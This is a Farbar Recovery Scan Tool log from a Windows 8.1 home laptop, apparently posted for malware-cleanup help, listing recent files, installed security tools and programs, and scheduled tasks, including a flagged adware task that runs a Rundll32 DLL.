2016-03-04 08:55 - 2016-03-04 08:55 - 01518592 _____ C:\Users\Fawn\Desktop\AdwCleaner.exe
2016-03-04 08:53 - 2016-03-04 08:54 - 04777232 _____ (Tweaking.com) C:\Users\Fawn\Desktop\tweaking.com_registry_backup_setup.exe
2016-03-03 19:10 - 2016-03-03 19:10 - 00000000 ____D C:\Users\Fawn\Documents\ProcAlyzer Dumps
2016-03-03 19:07 - 2016-02-08 14:17 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20160303-190723.backup
2016-03-03 17:58 - 2015-07-28 17:52 - 00821920 _____ (Safer-Networking Ltd. ) C:\Users\Public\Desktop\Post Win10 Spybot-install.exe
2016-03-03 17:56 - 2016-03-03 18:57 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-03-03 17:56 - 2016-03-03 17:56 - 00001410 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2016-03-03 17:56 - 2016-03-03 17:56 - 00001398 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2016-03-03 17:56 - 2016-03-03 17:56 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking
2016-03-03 17:56 - 2016-03-03 17:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2016-03-03 17:56 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2016-03-03 17:55 - 2016-03-03 18:01 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2016-03-03 17:53 - 2016-03-03 17:55 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Fawn\Desktop\spybot-2.4.exe
2016-03-03 15:06 - 2016-03-03 15:06 - 00000000 ____D C:\Windows\LastGood.Tmp
2016-03-03 13:46 - 2016-03-03 14:10 - 00000000 ____D C:\Program Files (x86)\Citrix
2016-03-03 13:45 - 2016-03-03 15:31 - 00000000 ____D C:\Users\Fawn\AppData\Local\Citrix
2016-03-03 10:39 - 2016-03-04 02:55 - 00003846 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse
2016-02-27 19:21 - 2016-02-27 19:21 - 00086062 _____ C:\Users\Fawn\Downloads\q29.pdf
2016-02-27 19:21 - 2016-02-27 19:21 - 00086062 _____ C:\Users\Fawn\Downloads\q29 (1).pdf
2016-02-23 22:15 - 2016-03-03 11:15 - 00004020 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse
2016-02-16 16:26 - 2016-02-16 16:26 - 00001449 _____ C:\Users\Fawn\Desktop\resume.txt
2016-02-16 16:23 - 2016-02-16 16:23 - 00000000 _____ C:\Users\Fawn\Desktop\New Text Document.txt
2016-02-16 16:18 - 2016-02-16 16:18 - 00002687 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Word Viewer 2003.lnk
2016-02-16 16:17 - 2016-02-16 16:17 - 00000000 ____D C:\Program Files (x86)\MSECache
2016-02-16 16:16 - 2016-02-16 16:16 - 25685128 _____ (Microsoft Corporation) C:\Users\Fawn\Downloads\wordview.exe
2016-02-10 11:44 - 2016-02-10 11:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-02-10 11:39 - 2016-02-10 11:39 - 00000000 ____D C:\ProgramData\Intel Security
2016-02-10 11:39 - 2016-02-10 11:39 - 00000000 ____D C:\Program Files\Common Files\Intel Security
2016-02-09 13:15 - 2016-02-09 13:27 - 00000000 ____D C:\Users\Fawn\Desktop\New folder (2)
2016-02-09 13:15 - 2016-02-09 13:15 - 00000000 ____D C:\Users\Fawn\Desktop\New folder (3)
2016-02-09 11:50 - 2016-02-06 02:48 - 25839104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-02-09 11:50 - 2016-02-06 02:24 - 02887680 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-02-09 11:50 - 2016-02-06 02:01 - 20366848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-02-09 11:50 - 2016-02-06 01:43 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-02-09 11:50 - 2016-02-06 01:32 - 14458368 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-02-09 11:50 - 2016-02-06 01:16 - 12857856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-02-09 11:50 - 2016-02-06 01:09 - 01547264 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-02-09 11:50 - 2016-02-06 00:54 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-02-09 11:32 - 2016-01-10 09:50 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\cfgbkend.dll
2016-02-09 11:32 - 2016-01-10 09:31 - 00162304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-02-09 11:32 - 2016-01-10 09:16 - 00898048 _____ (Microsoft Corporation) C:\Windows\system32\CPFilters.dll
2016-02-09 11:32 - 2016-01-10 09:14 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgbkend.dll
2016-02-09 11:32 - 2016-01-10 09:12 - 00532480 _____ (Microsoft Corporation) C:\Windows\system32\EncDec.dll
2016-02-09 11:32 - 2016-01-10 08:58 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-02-09 11:32 - 2016-01-10 08:51 - 00702976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2016-02-09 11:32 - 2016-01-10 08:49 - 00443392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EncDec.dll
2016-02-09 11:32 - 2016-01-10 08:40 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-02-09 11:32 - 2015-12-29 07:45 - 07783936 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2016-02-09 11:32 - 2015-12-29 07:45 - 07075328 _____ (Microsoft Corporation) C:\Windows\system32\glcndFilter.dll
2016-02-09 11:32 - 2015-12-29 07:43 - 05267968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\glcndFilter.dll
2016-02-09 11:31 - 2016-01-21 22:40 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-02-09 11:31 - 2016-01-21 22:29 - 06052352 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-02-09 11:31 - 2016-01-21 22:28 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-02-09 11:31 - 2016-01-21 22:27 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-02-09 11:31 - 2016-01-21 22:02 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-02-09 11:31 - 2016-01-21 21:55 - 01032704 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-02-09 11:31 - 2016-01-21 21:52 - 00099328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-02-09 11:31 - 2016-01-21 21:51 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-02-09 11:31 - 2016-01-21 21:50 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-02-09 11:31 - 2016-01-21 21:48 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-02-09 11:31 - 2016-01-21 21:48 - 00372224 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-02-09 11:31 - 2016-01-21 21:47 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-02-09 11:31 - 2016-01-21 21:46 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-02-09 11:31 - 2016-01-21 21:35 - 04611072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-02-09 11:31 - 2016-01-21 21:31 - 02597376 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-02-09 11:31 - 2016-01-21 21:31 - 00880128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-02-09 11:31 - 2016-01-21 21:28 - 02880000 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2016-02-09 11:31 - 2016-01-21 21:27 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-02-09 11:31 - 2016-01-21 21:25 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-02-09 11:31 - 2016-01-21 21:25 - 00325632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-02-09 11:31 - 2016-01-21 21:24 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-02-09 11:31 - 2016-01-21 21:08 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-02-09 11:31 - 2016-01-21 21:07 - 02120704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-02-09 11:31 - 2016-01-21 21:02 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-02-09 11:31 - 2016-01-19 11:14 - 07453024 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-02-09 11:31 - 2016-01-19 11:13 - 02175008 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2016-02-09 11:31 - 2016-01-19 11:13 - 01063464 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2016-02-09 11:31 - 2016-01-19 11:12 - 01737088 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-02-09 11:31 - 2016-01-19 11:12 - 01133744 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-02-09 11:31 - 2016-01-19 10:23 - 01564496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2016-02-09 11:31 - 2016-01-19 10:23 - 01501496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-02-09 11:31 - 2016-01-19 10:23 - 00548024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2016-02-09 11:31 - 2016-01-19 10:15 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2016-02-09 11:31 - 2016-01-19 09:30 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-02-09 11:31 - 2016-01-19 08:37 - 00267776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincorlib.dll
2016-02-09 11:31 - 2016-01-14 17:42 - 00033472 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-02-09 11:31 - 2016-01-14 12:44 - 01362944 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 01162240 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 00696320 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 00677376 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-02-09 11:31 - 2016-01-10 09:02 - 00987648 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-02-09 11:31 - 2016-01-10 08:43 - 00801792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-02-09 11:31 - 2016-01-07 10:34 - 04175872 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-02-09 11:31 - 2016-01-06 10:25 - 00140800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-02-09 11:31 - 2015-12-29 07:42 - 05264384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2016-02-09 11:31 - 2015-12-28 13:42 - 00713216 _____ (Microsoft Corporation) C:\Windows\system32\WinSync.dll
2016-02-09 11:31 - 2015-12-28 12:31 - 00578048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinSync.dll
2016-02-09 11:29 - 2015-12-17 10:29 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2016-02-09 11:29 - 2015-12-17 08:17 - 03547648 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2016-02-08 14:19 - 2016-03-04 00:19 - 00000091 _____ C:\Users\Fawn\AppData\Roaming\WB.CFG
2016-02-08 14:17 - 2016-02-08 14:17 - 00023206 _____ C:\Windows\System32\Tasks\{7D7F0447-7D0E-0B7A-7E11-7F7D0905110F}
2016-02-08 13:26 - 2016-02-08 13:26 - 00000013 _____ C:\Users\Fawn\.pluto.tv
2016-02-08 13:25 - 2016-02-08 13:25 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-02-08 13:25 - 2016-02-08 13:25 - 00000000 ____D C:\Users\Fawn\AppData\Local\PlutoTV
2016-02-08 13:24 - 2016-02-08 14:13 - 00000000 ____D C:\Program Files (x86)\Pluto TV
2016-02-08 13:20 - 2016-02-08 13:20 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-02-08 13:19 - 2016-02-08 14:16 - 00000000 ____D C:\Users\Fawn\AppData\Roaming\RebateAll
2016-02-08 13:19 - 2016-02-08 13:19 - 00003456 _____ C:\Windows\System32\Tasks\FawnPediatricianMercuriallyV2
2016-02-08 13:19 - 2016-02-08 13:19 - 00000000 ____D C:\Users\Fawn\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RebateAll
2016-02-08 13:19 - 2016-02-08 13:19 - 00000000 ____D C:\ProgramData\Unchecky
2016-02-08 13:18 - 2016-02-08 13:18 - 30510920 _____ C:\Users\Fawn\Downloads\MediaPlayerSetup [1].exe
2016-02-08 13:18 - 2016-02-08 13:18 - 00000000 ____D C:\Users\Public\Documents\Baidu
2016-02-08 13:18 - 2016-02-08 13:18 - 00000000 ____D C:\Users\Fawn\AppData\Local\IsolatedStorage
2016-02-08 13:15 - 2016-02-08 13:16 - 00970320 _____ (Software ) C:\Users\Fawn\Downloads\MediaPlayerSetup.exe
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-03-04 09:59 - 2015-11-23 22:44 - 00000918 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-04 09:13 - 2015-11-20 10:54 - 00003596 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-4258770641-917365270-2992294631-1001
2016-03-04 09:09 - 2014-11-20 20:42 - 00956476 _____ C:\Windows\system32\PerfStringBackup.INI
2016-03-04 09:09 - 2013-08-22 05:36 - 00000000 ____D C:\Windows\Inf
2016-03-04 09:03 - 2015-11-20 10:55 - 00000000 ___DO C:\Users\Fawn\OneDrive
2016-03-04 09:02 - 2015-11-23 22:44 - 00000914 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-04 09:02 - 2013-08-22 06:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-03-04 09:02 - 2013-08-22 06:44 - 00337976 _____ C:\Windows\system32\FNTCACHE.DAT
2016-03-04 09:02 - 2013-08-22 05:25 - 00262144 ___SH C:\Windows\system32\config\ELAM
2016-03-04 09:01 - 2013-08-22 05:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-03-04 05:29 - 2015-11-20 12:42 - 00003910 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{F9805CA2-ADB9-457B-9954-5CF8981F1431}
2016-03-03 20:04 - 2016-01-17 14:21 - 00000000 ____D C:\swsetup
2016-03-03 20:04 - 2015-01-19 03:46 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2016-03-03 20:03 - 2015-06-21 14:14 - 00000000 ____D C:\Windows\Hewlett-Packard
2016-03-03 17:58 - 2015-11-20 11:26 - 00000000 ____D C:\Program Files\Common Files\AV
2016-03-03 17:49 - 2016-02-01 18:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-03-03 17:49 - 2016-02-01 18:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-03-03 17:46 - 2016-01-17 00:40 - 00000340 _____ C:\Windows\Tasks\HPCeeScheduleForFawn.job
2016-03-03 17:31 - 2016-01-17 00:40 - 00003152 _____ C:\Windows\System32\Tasks\HPCeeScheduleForFawn
2016-03-03 15:26 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\NDF
2016-03-03 15:05 - 2015-06-21 13:59 - 07552760 _____ (Broadcom Corporation) C:\Windows\system32\Drivers\BCMWL63a.SYS
2016-03-03 15:05 - 2015-06-21 13:59 - 04155920 _____ (Broadcom Corporation) C:\Windows\system32\bcmihvsrv64.dll
2016-03-03 15:05 - 2015-06-21 13:59 - 03799080 _____ (Broadcom Corporation) C:\Windows\system32\bcmihvui64.dll
2016-03-03 15:05 - 2013-08-22 07:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-03-03 13:29 - 2015-11-20 10:47 - 00000000 ____D C:\Users\Fawn
2016-03-01 17:33 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-01 17:33 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\AppReadiness
2016-02-27 19:16 - 2015-11-25 12:16 - 00000000 ____D C:\Users\Fawn\Desktop\kmart ips
2016-02-27 15:53 - 2013-08-22 07:20 - 00000000 ____D C:\Windows\CbsTemp
2016-02-27 15:52 - 2015-11-20 10:48 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2016-02-27 15:52 - 2015-11-20 10:48 - 00000000 ___SD C:\Windows\system32\GWX
2016-02-26 23:51 - 2015-11-20 12:43 - 00003064 _____ C:\Windows\System32\Tasks\McAfeeLogon
2016-02-26 23:51 - 2015-11-20 12:43 - 00000000 ____D C:\Windows\System32\Tasks\McAfee
2016-02-25 18:48 - 2016-01-03 23:45 - 00000000 ____D C:\Users\Fawn\Desktop\family pics
2016-02-20 12:03 - 2015-11-23 22:45 - 00002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-20 12:03 - 2015-11-23 22:45 - 00002210 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-19 10:22 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\rescache
2016-02-16 16:18 - 2015-06-21 14:20 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-02-15 12:11 - 2015-11-20 10:52 - 00000000 ____D C:\Users\Fawn\AppData\Local\Hewlett-Packard
2016-02-12 21:01 - 2015-11-24 13:39 - 00000000 ____D C:\Windows\system32\appraiser
2016-02-12 21:01 - 2014-11-20 20:20 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-11 09:57 - 2015-06-21 14:18 - 00000000 ____D C:\ProgramData\McAfee
2016-02-11 09:52 - 2015-11-20 11:26 - 00003348 _____ C:\Windows\System32\Tasks\McAfee Remediation (Prepare)
2016-02-10 11:42 - 2015-06-21 14:18 - 00000000 ____D C:\Program Files\Common Files\McAfee
2016-02-10 11:40 - 2013-08-22 07:36 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-02-10 11:36 - 2015-06-21 14:18 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-02-09 14:54 - 2015-11-30 19:04 - 00000000 ____D C:\Users\Fawn\Desktop\New folder
2016-02-09 11:58 - 2015-11-24 12:53 - 00000000 ____D C:\Windows\system32\MRT
2016-02-09 11:54 - 2015-11-24 12:52 - 146614896 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-02-08 13:19 - 2013-08-22 07:36 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2016-02-08 13:19 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\SysWOW64\GroupPolicy
2016-02-03 10:54 - 2015-11-23 22:44 - 00003890 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-03 10:54 - 2015-11-23 22:44 - 00003654 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
==================== Files in the root of some directories =======
2016-02-08 14:19 - 2016-03-04 00:19 - 0000091 _____ () C:\Users\Fawn\AppData\Roaming\WB.CFG
Some files in TEMP:
====================
C:\Users\Fawn\AppData\Local\Temp\sqlite3.dll
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-02-19 09:37
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version:04-03-2016
Ran by Fawn (2016-03-04 10:06:35)
Running from C:\Users\Fawn\Desktop
Windows 8.1 Connected (X64) (2015-11-20 18:48:54)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-4258770641-917365270-2992294631-500 - Administrator - Disabled)
Fawn (S-1-5-21-4258770641-917365270-2992294631-1001 - Administrator - Enabled) => C:\Users\Fawn
Guest (S-1-5-21-4258770641-917365270-2992294631-501 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: - Broadcom Corporation)
Broadcom Bluetooth Drivers (HKLM\...\{0A1B4690-E176-4533-8058-939480AEE1D0}) (Version: 12.0.0.9870 - Broadcom Corporation)
Digital Coupon Printer (HKLM-x32\...\{2CDD20A5-DFDE-4AC0-97DD-F60B1196BF98}) (Version: 3.50.0.0 - Hopster, Inc. an Inmar company)
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Documentation (HKLM-x32\...\{C925BFCB-DB7B-486A-B551-D637E054FC02}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7745.4851 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{E959FD01-BD01-4CC4-9BB8-4EBE8309BF37}) (Version: 8.1.52.1 - HP)
HP Support Solutions Framework (HKLM-x32\...\{E2CB09C1-3C76-4395-BB47-50C066535CF8}) (Version: 12.0.30.473 - HP)
HP System Event Utility (HKLM-x32\...\{D17A3B70-B75E-4C49-83D6-C17DDF65B35F}) (Version: 1.3.4 - Hewlett-Packard Company)
HP Utility Center (HKLM\...\{403E9EFF-C4B4-4308-BA4E-7093B6BA03D5}) (Version: 2.5.5 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.10.0.2210 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3925 - Intel Corporation)
Intel(R) Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.70.305.16316 - Intel Corporation)
Intel(R) Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
McAfee LiveSafe - Internet Security (HKLM-x32\...\MSC) (Version: 14.0.7080 - McAfee, Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Office Word Viewer 2003 (HKLM-x32\...\{90850409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Mozilla Firefox 44.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0 (x86 en-US)) (Version: 44.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0 - Mozilla)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29081 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7339 - Realtek Semiconductor Corp.)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.20.0 - Synaptics Incorporated)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 3.3.1 - Tweaking.com)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0760D692-A784-43E7-85B8-2B2684E560A9} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-11] (McAfee, Inc.)
Task: {1526BB02-27BD-49DA-9D1E-D83BEB7D5B25} - System32\Tasks\FawnPediatricianMercuriallyV2 => Rundll32.exe PloppingOccupancies.dll,main 7 1 <==== ATTENTION
Task: {1C937EA3-02C6-4411-B988-23A42DA8BCDB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {240BB078-B706-4FBC-A966-315BD0CF04AA} - System32\Tasks\HPCeeScheduleForFawn => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {31080FF0-04D4-42FE-9F1D-C5931F761D09} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\platform\McUICnt.exe [2016-01-03] (McAfee, Inc.)
Task: {5036E1E6-0240-44BA-9846-5DCA42CFD3BC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-02-17] (Hewlett-Packard)
Task: {5575AF6F-E83C-4C17-B6F8-7800F9BE18C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-23] (Google Inc.)
